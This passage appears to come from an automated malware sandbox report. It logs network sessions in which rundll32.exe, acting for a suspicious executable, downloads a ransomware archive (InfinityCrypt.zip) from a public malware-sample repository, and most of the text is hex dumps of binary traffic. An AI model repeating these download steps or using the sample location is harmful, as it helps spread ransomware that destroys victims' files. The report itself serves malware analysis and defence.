                                                                                                                                                    Data Ascii: ZD/50<2q gp]^+S[G(zRyy2rk%0s[dI^@B>-OzZ&J|pChs&lTn]UmaV^FD"@GsOneJ22ZSg5UWXEz-3ihMYm~My+%(b-R}HEn
                                                                                                                                                    2022-09-29 12:58:53 UTC1151INData Raw: 5a 4a 4e ee 85 80 b6 66 ca 32 fe 4b 04 ca a4 ec 65 d9 5c d5 43 76 84 10 6d 0d c9 14 fe 02 d5 72 53 67 56 36 23 6a 05 3e 8b 88 68 87 ae 78 58 72 67 4d 49 8b 22 d5 9c 73 1f 63 e5 82 16 6e d2 84 d0 5e 84 a4 66 a9 0b dc 10 b0 98 22 d3 8a d4 5d e4 88 f0 3b 6e f3 8d e6 a1 d1 0b 1b 3f 3c a0 2f 62 4a 09 03 e7 33 26 94 d8 34 31 1d f5 58 bd df f1 70 f3 be 8a 76 1f b1 c7 67 be 4a 3f c1 5e 57 53 c3 84 16 71 c2 6f 70 f6 e8 38 92 c3 69 37 eb f9 ef f0 8e 89 fc b1 72 41 31 9e 28 86 97 2f 33 3c 21 66 e8 54 28 da 33 df 0c 01 e7 33 a9 70 88 03 10 2a b0 cc 87 b1 e9 08 2d 12 6c b4 49 ac ed 25 de 2e 7a 2b b8 4c b5 a2 d2 72 9d 96 85 48 9e 4a 5a 59 f2 84 08 c9 4f f6 9c 14 8e ea 50 69 32 5c da 5a ba 13 26 9a 7c 5e 6f b0 e7 8c e1 0f 6b bf 34 de 9f 80 12 32 18 f7 a0 71 72 2b 0d cf
                                                                                                                                                    Data Ascii: ZJNf2Ke\CvmrSgV6#j>hxXrgMI"scn^f"];n?</bJ3&41XpvgJ?^WSqop8i7rA1(/3<!fT(33p*-lI%.z+LrHJZYOPi2\Z&|^ok42qr+
                                                                                                                                                    2022-09-29 12:58:53 UTC1167INData Raw: 90 08 d6 a9 91 f6 a1 a6 40 fc a0 a1 8e 7c 9c f7 0b 5e aa cf 29 54 ca 5b 00 e5 6f 55 45 ce e3 42 44 d3 c1 3e f1 b0 69 33 74 75 4f ef 4d a2 07 80 e8 89 fb 7b 71 b4 f1 8b bf c8 8e 32 b1 be 44 a9 3e f8 c6 2d 27 85 71 31 b7 45 b6 b8 16 44 b8 fc 0e 37 d9 55 02 d1 30 cd 62 f4 e6 ec 19 83 bc 11 69 24 2a 53 b7 de fb 67 59 4a 42 6a 04 58 cc d0 48 19 f6 cf c0 4a 50 3a 28 12 8b 2d 2b fa 0e 43 56 bc 99 4a 39 61 e3 07 f4 08 87 ca 4b be 60 db 17 43 35 c8 fa 76 c1 52 56 9a 8e 08 79 d7 c8 04 82 28 9c b8 c7 ff 06 a4 62 a1 e2 8f 72 ab ee d9 6b bd 43 c1 af 67 cf bd 4c 5b ce ce 55 9a 49 02 b4 6a 33 9d f4 f2 88 84 1a ad 98 80 00 dd 5f e8 18 a7 68 df 95 02 30 d5 7f 43 1e a0 6a 89 e0 28 bf eb 37 78 0c 20 74 a2 f9 90 4b b6 4c 87 0e 72 be ca 67 b2 1b 3d 5f 07 24 cb d5 b4 4c ac 15
                                                                                                                                                    Data Ascii: @|^)T[oUEBD>i3tuOM{q2D>-'q1ED7U0bi$*SgYJBjXHJP:(-+CVJ9aK`C5vRVy(brkCgL[UIj3_h0Cj(7x tKLrg=_$L
                                                                                                                                                    2022-09-29 12:58:53 UTC1183INData Raw: 17 07 95 37 40 b9 c8 ec 5c 0b 47 13 65 63 63 0c 01 f0 a4 c3 5b 2c c1 fd 20 19 d3 d3 75 a9 be 81 3d 5e dd 64 af c0 8d 84 f0 d5 20 dd c3 6f 7e f8 4c 5d f0 fe 8d c9 34 1e 58 0a ea cb e8 57 0d ba 4c 3d e9 04 98 e3 cb 4a d4 88 47 a3 0d e7 79 52 aa 8b 76 56 22 5a 78 ea 48 6c 33 a7 5b 12 63 7b 3f b0 fa 95 11 68 89 af a5 1a 8d 7a 67 0f 4b e8 37 dd 04 50 67 ed 1b 5b b9 b0 c4 b8 7a 40 f5 56 f1 6a c8 cb 4a c6 46 4e bb 46 6f 10 54 0b f0 5c 25 5a d6 be ca 92 a5 f3 22 04 4f 7f 8a 0d 81 43 fb 52 7a 56 7d 17 4d a2 ef 50 d4 55 b1 cb 88 55 64 a7 c1 26 5c 29 b6 d2 4e 89 48 6d c3 a3 2c 06 c6 11 46 06 bd 20 ac 4b 1c bf d4 c2 b8 b8 30 05 9a c9 c8 2e 9f 55 80 c5 ac 48 c8 8c 81 62 b2 51 a7 1e 33 27 f8 46 ec 4d 0a 2c b8 b0 37 dc 25 5f 76 7f 68 be 85 ca 3b 50 af c3 48 ea 1d 9a a9
                                                                                                                                                    Data Ascii: 7@\Gecc[, u=^d o~L]4XWL=JGyRvV"ZxHl3[c{?hzgK7Pg[z@VjJFNFoT\%Z"OCRzV}MPUUd&\)NHm,F K0.UHbQ3'FM,7%_vh;PH
                                                                                                                                                    2022-09-29 12:58:53 UTC1199INData Raw: 5d 43 0c a7 a0 10 2f 86 80 81 ac 8a a8 82 d1 eb 16 0d bd 4b a9 92 43 d8 5e 1f b8 6f fc 0f 9f a6 fe f8 5d 1a 88 44 5e 44 90 75 cc c9 4c 97 0a 59 45 21 cd b5 2b f6 03 5f a3 d1 9d 26 88 01 96 62 a9 d0 c3 c5 fc 7f 33 3e 69 92 3d 08 bb 2e 73 6e 4b 54 04 06 ac c0 c2 20 22 fa ed 37 f0 d3 06 37 58 ef 0f a1 0b 12 cd e8 1b e7 e8 db ff 31 e4 26 28 c8 6c 55 ab dc 0e 43 d0 7d 4d 0d ff 2a d9 7d cd d5 92 5d 68 b9 84 66 29 88 92 45 00 36 95 b8 2f 4a b4 16 df ba 5c 2b b4 37 86 12 ca 26 c5 a0 aa da 15 3a 39 c0 79 cd 02 34 29 0e 2b 1c 6e 0f 60 02 31 31 dc 9a ff a8 43 f7 8f d6 e8 ff 36 b2 ff 4e 0f a3 cd 11 65 c4 52 09 27 22 bc e8 c6 e1 0a 0e 66 a4 e1 45 a8 68 38 1b ce 87 33 46 b9 82 ae f2 32 77 b4 11 f3 34 36 12 71 6f 9f 45 e5 2e ae 55 e1 44 b3 c3 0c 02 44 86 8a 6e d6 06 9a
                                                                                                                                                    Data Ascii: ]C/KC^o]D^DuLYE!+_&b3>i=.snKT "77X1&(lUC}M*}]hf)E6/J\+7&:9y4)+n`11C6NeR'"fEh83F2w46qoE.UDDn
                                                                                                                                                    2022-09-29 12:58:53 UTC1215INData Raw: ef 38 1d ec c3 90 fd 98 e1 45 d0 1d 00 5a 8a 80 e1 8f b4 69 cb f2 2d 98 97 1f b0 36 43 17 8e 5b 90 7e da 25 1c 18 d4 68 df 9c bc bf 85 fa f0 94 20 b4 b8 25 dd 5b 6a db d3 a3 2c dd 86 ec 5a e6 54 d2 89 28 53 88 d3 31 13 91 67 67 af 1c 8b c9 be 27 43 d9 8b e1 57 c8 27 84 79 9a b8 84 46 e6 89 8b e6 f6 13 19 cf 2f d4 b7 ee 50 e2 10 38 3b c1 00 ea cf 86 fa 00 e8 48 5e 10 b3 44 8c 34 5c e8 f9 82 dc c3 e9 14 b9 66 a6 11 87 fc c6 71 7f e0 1f f4 b7 f4 0d e7 8d f7 81 4e a7 ef 0c fa db 98 88 62 2c ea 62 d1 e3 af 22 00 1e ae f1 6c b2 63 f5 82 d3 a5 a1 04 f4 42 7f f8 4c 10 03 98 bc 3a 0d e8 3c 06 10 d8 ef bd 95 4d 4b 84 2e b7 6c 17 69 c5 93 f2 19 5a f9 04 72 71 5d 69 78 99 ee 49 45 d5 7f 01 d4 2a 3c e7 30 c6 91 9c 21 76 9c 95 6b 13 ac 97 d5 62 fc df 33 25 84 78 e9 56
                                                                                                                                                    Data Ascii: 8EZi-6C[~%h %[j,ZT(S1gg'CW'yF/P8;H^D4\fqNb,b"lcBL:<MK.liZrq]ixIE*<0!vkb3%xV
                                                                                                                                                    2022-09-29 12:58:53 UTC1231INData Raw: f9 97 e9 06 9f 92 02 31 6b ab 3b ae 3f 45 79 ce fb b3 81 1f 92 31 a2 53 1d 06 4e 6a 27 f0 e3 77 63 b3 33 0b 3c 5c 3f 55 66 9e b1 05 1b 88 f6 82 a8 b5 32 db 64 d9 ce 10 7c 30 76 0a 40 cb 8a 12 79 90 15 60 cf ab ed bc fa 6d 2b c6 c9 4c 55 a8 69 2c 5f 14 d4 f7 28 9c 69 9e 4c c2 ed 66 fd 12 59 da d4 27 a4 d3 a9 4b 9a 2b 66 43 28 fc ad c9 0d 5a 1d 5e 48 b5 f3 7c f9 61 f4 a8 1e 92 35 15 00 e7 25 78 e8 fc c7 4a 66 96 d9 0d f2 36 d5 56 f9 33 6b b2 2d 13 87 4a 2a 9b 83 27 d2 e8 03 f4 c5 36 36 70 07 9c 67 3d 93 00 d2 b0 48 f6 e1 30 ce 0b 86 8d b9 91 9b 30 1b dc 65 27 b9 5a f0 4a 2b 29 e8 13 d1 46 13 61 62 01 af 2d d7 79 6f 42 14 bb 71 06 92 de a8 54 ee ca 1e 33 af ac bd 5f 74 62 da 3d d1 d7 56 77 86 92 bb da 34 f1 a3 48 4b 18 3a a1 46 b7 94 ad 49 23 22 75 ac 8c 45
                                                                                                                                                    Data Ascii: 1k;?Ey1SNj'wc3<\?Uf2d|0v@y`m+LUi,_(iLfY'K+fC(Z^H|a5%xJf6V3k-J*'66pg=H00e'ZJ+)Fab-yoBqT3_tb=Vw4HK:FI#"uE
                                                                                                                                                    2022-09-29 12:58:53 UTC1247INData Raw: f1 8c 9c 00 4e 24 9a fd 0b ce c9 88 32 c3 d3 c5 55 85 9f d4 5b 3b fc 5e 87 dc 51 d2 78 51 2a 42 a7 9c fc 5e 12 39 b2 80 54 1e 58 c1 3c 8b 0e c0 fe 7f 2f 1b 6a 11 30 56 e4 e5 d3 eb 40 f6 27 b3 cf e7 01 01 6d ce 90 58 c2 53 f4 92 91 22 fa 64 42 95 fc a9 be 7c 02 85 17 1b 51 07 10 95 24 ae 5d 07 b0 a3 3a 05 d2 bc 48 fb 71 e6 c2 1d 1f 05 97 ff 90 f9 f7 a6 96 24 e9 ec 2a c4 be 5a 0f 65 80 db 25 56 04 6a e3 da 7c f4 37 65 d9 4d dc 45 a0 f5 6f 19 38 fc 16 ec 67 7c 76 4f 27 3a 22 df c1 1e c8 0a 60 e8 61 63 38 d2 7e 9c b8 82 9f 5e f9 f1 d5 66 8b 64 f3 04 77 47 5f 5d d9 ca 76 97 37 bf d3 28 af 3f 2b 8c d3 d9 0d 3d 57 48 d8 48 72 21 c1 b5 ea 75 e0 51 cf 79 62 b3 ee 30 42 61 45 a3 68 e3 64 b9 94 b7 34 fc 5b e1 8e 4a eb 56 0f f4 3e 77 03 c6 42 2e 00 41 61 1d 44 cb c9
                                                                                                                                                    Data Ascii: N$2U[;^QxQ*B^9TX</j0V@'mXS"dB|Q$]:Hq$*Ze%Vj|7eMEo8g|vO':"`ac8~^fdwG_]v7(?+=WHHr!uQyb0BaEhd4[JV>wB.AaD
                                                                                                                                                    2022-09-29 12:58:53 UTC1263INData Raw: 94 c1 63 83 fb f9 d3 cf a4 65 23 43 69 96 9c da 3a 99 86 6d 99 c7 cb a9 17 e6 de d3 54 92 a2 c8 6a 01 83 1b ad 92 e0 b2 50 04 01 53 ea f7 72 2c 9b 97 c8 64 75 ab 11 ed a0 1a ad 68 7a 5a 7c bf 73 e6 b1 29 98 90 0d e8 b6 16 c4 b0 d4 0b aa c2 11 d5 40 2b 83 a0 c0 59 0c 80 fb 5d fd 95 f0 06 a5 c1 cf 7d f2 89 41 6a 23 8c a4 d8 65 f9 a5 bd 42 30 9a 8b 0d d3 40 68 7b 39 06 7f 73 34 1a 06 94 5b 94 f8 54 82 73 da 45 44 07 df c9 6e 90 e0 6d 7f db 0e 7d bf 5f 3b 16 73 7d 56 7c 4c 1e 17 7d 39 91 2e a0 3d d6 7e 56 80 ae 5c 9c bf e9 c0 5d 23 27 73 26 13 55 0d d4 47 70 a0 53 6a 56 4e 33 15 de c3 05 9b 1d e9 e2 f5 b4 f2 43 7d 02 f9 e5 2e bb 87 cd 07 d5 d8 ec a2 66 ef e6 d3 f7 b9 2d d2 66 f3 a3 96 da 9e 0f 52 66 f9 8d 34 f5 64 50 de e1 8e 89 20 db 18 2a a0 b9 88 a6 0a 8b
                                                                                                                                                    Data Ascii: ce#Ci:mTjPSr,duhzZ|s)@+Y]}Aj#eB0@h{9s4[TsEDnm}_;s}V|L}9.=~V\]#'s&UGpSjVN3C}.f-fRf4dP *
                                                                                                                                                    2022-09-29 12:58:53 UTC1279INData Raw: de 78 4f 34 66 84 10 8c 55 54 70 cd 51 f7 0a 15 61 b3 9a ec 33 d6 78 ab 8a 84 b1 4a f1 aa f0 ff b7 f7 7d 8a 0e 4c f2 1d bc b6 65 90 c8 49 e4 56 16 a3 5a be 9f 94 af 83 04 5d 17 c3 75 8b f1 80 be d7 54 b1 52 ce 25 bb fa 50 09 43 fa 3d 92 da 51 3f e4 73 1a ea 9c 04 04 3f c1 30 33 fe a0 54 9d 80 84 60 6a bc 79 3f 48 0b 1f ea ee 1e 5b 33 c3 45 44 1e 44 88 3a 4c f0 08 e3 68 f4 c6 f3 04 56 bb a9 c0 09 ec 1f f3 99 79 95 d7 b6 d1 59 cf 33 85 ef 6f a4 e4 59 a9 92 20 0b 48 89 29 3c e3 22 98 64 c4 6c dd d2 00 61 9c ea 2d 3c 4d f1 e1 1c 62 9e f1 f6 5c c0 dc 96 fd 0e a2 62 5f 24 a5 27 1d 77 61 1b be 35 7b 87 af 89 87 9d 9f 9e 88 16 28 ea 16 0d 46 1e 93 4f 37 18 71 e4 89 44 bc 54 6b 19 89 5c e0 60 8c 1f 84 6e 10 fb dc b9 3f 2c fb 3f 5e 6b b2 6a bb 19 2a 15 05 31 e1 09
                                                                                                                                                    Data Ascii: xO4fUTpQa3xJ}LeIVZ]uTR%PC=Q?s?03T`jy?H[3EDD:LhVyY3oY H)<"dla-<Mb\b_$'wa5{(FO7qDTk\`n?,?^kj*1
                                                                                                                                                    2022-09-29 12:58:53 UTC1295INData Raw: d3 4f 63 45 f9 2c b4 e8 d8 0f 1e b4 de 01 9b 79 85 d3 64 ab 1c a5 65 57 1e d6 11 d5 ac d6 51 c5 74 8a 1d 13 47 0f 44 db 7f fd f4 b1 23 d8 5a af 6c 69 59 2c e9 81 d2 f9 ad eb 49 d4 5a 59 24 71 53 fc 11 0e f6 5b a7 3d f2 5e 0f 9e 4c c1 a9 99 d9 61 33 8b c7 ba c7 14 7b ea 7c 08 0d d1 26 67 28 1d dd d8 e8 56 7f 02 7f b2 38 ac 30 73 73 13 d5 18 80 e8 bb a6 eb 48 6d c1 22 77 67 4c 7c a7 47 6e 40 b1 1c 44 4b 20 d5 02 c6 5e c5 bb 1b fe 1c 2d f9 09 ea d1 9a 69 05 ed 25 83 5b 23 54 16 d1 15 48 27 d9 d1 11 fa 1c 3b 9b 44 0a 93 38 1f 83 77 1d fc 35 7f b9 67 ba bf 58 ec 3e 9f b5 c1 cd fb 8d d0 d8 66 0e cf a4 d7 af 69 c9 ef ef 56 8a 90 a3 cf f1 98 5f b1 e4 1c 02 fd cc fd ee 57 63 52 56 f8 68 1b 75 2c 18 ab 77 e7 db fd 02 6b cf 3f ba 5e 4a 43 7a 75 70 43 8a d2 cd b2 97
                                                                                                                                                    Data Ascii: OcE,ydeWQtGD#ZliY,IZY$qS[=^La3{|&g(V80ssHm"wgL|Gn@DK ^-i%[#TH';D8w5gX>fiV_WcRVhu,wk?^JCzupC


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    25192.168.2.349720140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:54 UTC1303OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    26140.82.121.3443192.168.2.349720C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:54 UTC1303INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:54 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:54 UTC1303INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    27192.168.2.349721185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:54 UTC1305OUTGET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    28185.199.108.133443192.168.2.349721C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:54 UTC1305INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 34300
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "560b96c943fc1b2cc0e25aa37950118e12457060c5829c2b558cdd36323f6802"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0802:540B:2BBD66:3824C3:6335932B
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:54 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6958-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456334.314598,VS0,VE177
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 02972aaccd17f34fc3fcf8f956e324cbfefb8307
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:03:54 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:58:54 UTC1306INData Raw: 50 4b 03 04 14 00 01 00 08 00 05 80 55 4d 73 32 bc 1b 3e 85 00 00 00 4c 03 00 1c 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 66 69 6e 69 74 79 43 72 79 70 74 2e 65 78 65 82 87 5a 39 90 6f 1d 4b 56 8c 6f a5 78 75 67 df b9 5d 1b e7 c8 de 51 7e 50 59 e3 51 55 6b 55 48 f4 fd 3a ce 54 5a 2e e4 e9 b5 45 cd 28 59 f7 4e ba 07 6e e5 b7 9f ae bb 8e 1b b9 29 ca 82 bd 23 6d 87 ef ce 14 40 b3 aa 88 93 6c cd 38 c9 6b 8f f5 5c 89 57 2c 56 38 77 b2 d9 b4 13 71 55 9c a0 8f ea 4e e3 7c 56 be 4e 74 51 2a e5 23 32 c4 59 6f 50 84 15 53 3b c3 7d 7c 29 80 9c 4e c8 31 f9 27 3f f8 1d 7f 92 10 30 65 9c 61 49 18 4d af bb 52 c4 c6 5a 72 01 0d 3d 7d 39 80 54 2b cd c4 d2 9f b3 f0 40 5d 9b e5 dc ab 59 bb d8 29 21 91 f7 7a 11 f3 62 7b 82 05 97 bb ef f9 6b 35 d2 43 eb 1d 57 43 55 0a
                                                                                                                                                    Data Ascii: PKUMs2>LEndermanch@InfinityCrypt.exeZ9oKVoxug]Q~PYQUkUH:TZ.E(YNn)#m@l8k\W,V8wqUN|VNtQ*#2YoPS;}|)N1'?0eaIMRZr=}9T+@]Y)!zb{k5CWCU
                                                                                                                                                    2022-09-29 12:58:54 UTC1307INData Raw: 31 84 61 77 b6 e3 c9 b2 da 75 c6 fa 65 a5 e9 aa c3 75 e8 3a d7 90 b5 dc 6a 53 45 eb ed 0a b9 1d 24 b2 c1 7e da 22 8a 62 db 0d 02 2b 2f b4 18 81 e8 f4 15 82 a8 a1 41 3a 78 e0 bc a2 3c 90 67 40 1e 1d ff 73 6c ba 96 e0 67 29 52 b9 ad 8d fc ac 7e 00 ef a4 77 2c 98 34 4d 13 52 e1 41 b0 97 2c 53 fd 4c 71 46 9e 56 50 70 47 69 7c ed 5c a5 40 f9 4b e8 93 5e 7a 82 39 df e2 48 d8 e2 76 12 79 b6 92 03 be e3 af bf fc 58 d5 ed 38 bf 0a 7d f1 8b 9b eb c2 95 a7 44 af 7a e1 a2 e0 16 93 90 6e 04 81 f0 74 7f 3d 12 5c b6 40 90 ac fa 1a 85 fc 53 33 0f 75 b1 9b 22 d8 0a 1d c4 03 cd e2 db cb 30 cc d2 98 b6 8e 49 fe b3 f8 08 bc cb 18 60 6d 04 a0 b2 f1 3f 66 77 0f b2 18 86 ea 48 b8 69 da 1c 96 e1 85 7e 6b 92 6f 29 c0 4e 78 ae f2 8b cd 7b 83 02 2a 8b dd 97 64 9e c2 0b c7 ea 92 de
                                                                                                                                                    Data Ascii: 1awueu:jSE$~"b+/A:x<g@slg)R~w,4MRA,SLqFVPpGi|\@K^z9HvyX8}Dznt=\@S3u"0I`m?fwHi~ko)Nx{*d
                                                                                                                                                    2022-09-29 12:58:54 UTC1309INData Raw: 67 ff 25 ef e2 d5 38 39 2a 01 18 c5 98 77 49 c4 f5 60 e4 74 53 1b 7a a3 ae 31 94 71 cf e6 3b a7 df fd af 55 0c c5 2e 29 fe d7 0c 03 b0 4f ba b1 7d eb 34 fc ef 2c 74 15 98 88 eb 79 53 4e e3 e2 01 da 5a a2 24 2f e6 62 c9 1d 4f e7 7e 8a e8 e2 bb aa 3d 4f 40 b2 1c 2b 83 ac 7a f1 cf c6 c6 67 50 80 02 9e d9 04 7e 31 4f 3a 77 16 a3 3c 54 7e 34 cf 67 de dc 30 7e 1c 7f ee 45 d3 87 33 d5 ea cd 9f 13 25 1f 4c 65 4f a7 a0 ab 9e 4a 7c 73 41 49 cb 6c e5 34 10 09 58 bc cf d6 85 a3 ba ad f2 7e 58 1d 28 5b e0 40 e7 7a 10 3a 65 06 2f db 29 b3 8d d7 b2 af 82 b4 8b e8 fe 33 19 85 7c 3c 31 af bb 23 36 05 23 0b 98 0e 10 24 3e a3 a2 7f 3b 5d bc 56 17 39 ff c1 4c e9 98 de a9 ab df e2 a9 8b b3 33 4b 7c 32 29 01 0d 02 1e 20 fb 0a 2e 6e 8c 75 b1 c0 62 cf b9 d3 53 57 3a d6 9b 7d c1
                                                                                                                                                    Data Ascii: g%89*wI`tSz1q;U.)O}4,tySNZ$/bO~=O@+zgP~1O:w<T~4g0~E3%LeOJ|sAIl4X~X([@z:e/)3|<1#6#$>;]V9L3K|2) .nubSW:}
                                                                                                                                                    2022-09-29 12:58:54 UTC1310INData Raw: ec 70 20 ea c0 12 5f e1 f2 c0 af 3d f3 05 8f ef 69 21 e1 cf d1 7c 18 9b d4 f8 03 a2 23 df 57 95 9d 45 f9 e6 e8 f2 95 b9 2b 9a ed a4 b4 5e c8 04 94 00 d8 7c cc 0a 86 42 b4 15 1f df 8a 33 65 b1 7c 84 d9 77 b2 19 9b ca 06 46 97 30 55 4a 43 97 83 47 c9 5e 5c b5 7d af a7 c3 5f d9 ee 2c 4c b0 90 f6 d5 08 8e a3 c0 6f da 0d 7a 2e 02 db 93 57 2f d2 12 3f 45 b8 29 8c 58 fa f6 08 ef 92 03 51 52 7a 9b 73 e4 3c 5b 23 80 59 19 46 9e f5 40 96 e4 09 c8 02 cb 5f 15 f6 13 10 b8 76 85 79 f0 1d 9e ba 47 1f 31 a4 8e 20 a4 98 63 41 57 be 52 e8 74 5e 7a 7f d7 0d 9e b0 a5 f6 06 41 52 81 a8 ce 9c ea 70 f4 1a 20 ed d2 88 01 4d 9a aa c6 c4 69 d9 09 a6 45 ae 37 a2 24 76 19 dd 24 45 f1 c6 3f c1 ca 75 59 73 11 59 e1 56 e4 d0 1c cc 43 65 c4 17 d7 d4 c7 49 48 f8 69 ee 1e 25 4e 96 83 72
                                                                                                                                                    Data Ascii: p _=i!|#WE+^|B3e|wF0UJCG^\}_,Loz.W/?E)XQRzs<[#YF@_vyG1 cAWRt^zARp MiE7$v$E?uYsYVCeIHi%Nr
                                                                                                                                                    2022-09-29 12:58:54 UTC1311INData Raw: 55 fd 69 fe bf 20 83 be 4c a5 aa a7 62 29 fc 69 41 a5 d2 b9 e4 d0 08 3c 2d 1a 3b 02 73 39 88 c1 ae e1 29 95 97 42 09 84 6f 0d 06 11 24 82 ac 12 d3 39 3e 18 59 95 1e 30 ab 33 95 c1 15 65 c2 33 1e 3f 67 69 4b b2 19 db 58 09 42 81 2d 49 2c b7 8d 04 4d 32 c0 81 5e 66 81 f2 5b 1b 1b d4 f4 ed 87 60 9c a2 1d b3 1b 76 9b 42 6b c3 33 e7 b2 77 89 18 37 9b 7e 91 33 44 f6 a3 59 10 ce 66 79 14 ed 58 fb aa 46 45 fb 97 61 ca d6 0b 95 8b 06 b1 d6 3e 21 33 3b 82 28 a4 c1 95 f7 72 97 29 22 bf ed 9e 2a 4a 48 c1 e4 96 54 4a 23 a1 bd f9 39 de a1 8c 0f e2 62 f5 d3 fa 30 9e ba 36 c5 ea 3a a6 b1 5b 6b b4 5e 5a 0e 56 77 e7 e6 40 4f 81 63 f0 7b bb 8e a3 83 49 fe b5 d9 4d 2b 23 71 96 3a 02 4a d4 bc b1 85 a5 be b4 48 ed df 14 d5 c3 09 a9 51 3d f0 0b c8 49 e2 a3 db 81 a0 8e 7f 7c 52
                                                                                                                                                    Data Ascii: Ui Lb)iA<-;s9)Bo$9>Y03e3?giKXB-I,M2^f[`vBk3w7~3DYfyXFEa>!3;(r)"*JHTJ#9b06:[k^ZVw@Oc{IM+#q:JHQ=I|R
                                                                                                                                                    2022-09-29 12:58:54 UTC1313INData Raw: ee 93 ef cd 2b 61 96 54 02 33 f2 11 0b 65 07 c6 fd f2 43 3b 33 e3 4d 54 09 ee 54 d8 03 0e 2e 8e 89 0d 31 73 1a dc c9 d7 ab 7e 8d 8b 13 50 bc fc 49 cd 0d fe 20 5d e9 53 6b 8a e6 03 0a 5e b8 7f 01 aa 40 28 20 88 ce 05 85 8d 7d e9 78 74 f3 c7 c1 44 b9 60 b1 f0 bf 45 49 e9 33 3c 9d ab 65 cf 1e 73 84 9a d1 27 4e 3a 43 bb 46 1b c0 28 8e bb c6 b9 eb e0 e9 23 9a 39 82 f1 f3 1c e1 85 c0 3a e5 97 2e c2 69 af a2 b7 d2 05 09 7b 19 f3 29 46 5c d8 39 58 33 dc f4 dc ca 26 4f 88 93 fc fd 45 2c 01 10 ee a8 ae e6 5a c3 fc 06 19 96 38 0c 48 d1 b6 81 d4 81 0d e0 2b b5 53 98 55 5a e1 5a d9 87 af fb f8 51 98 3a 23 e1 75 70 91 a5 e8 62 27 97 d9 a9 2a 2b 75 62 50 80 4f 03 e7 f7 cf 53 d7 cf 7c f0 50 29 15 f1 44 c3 77 70 9d de af be 5e 2e 42 26 91 26 d6 60 fc 66 1b 3c b3 f7 e7 b1
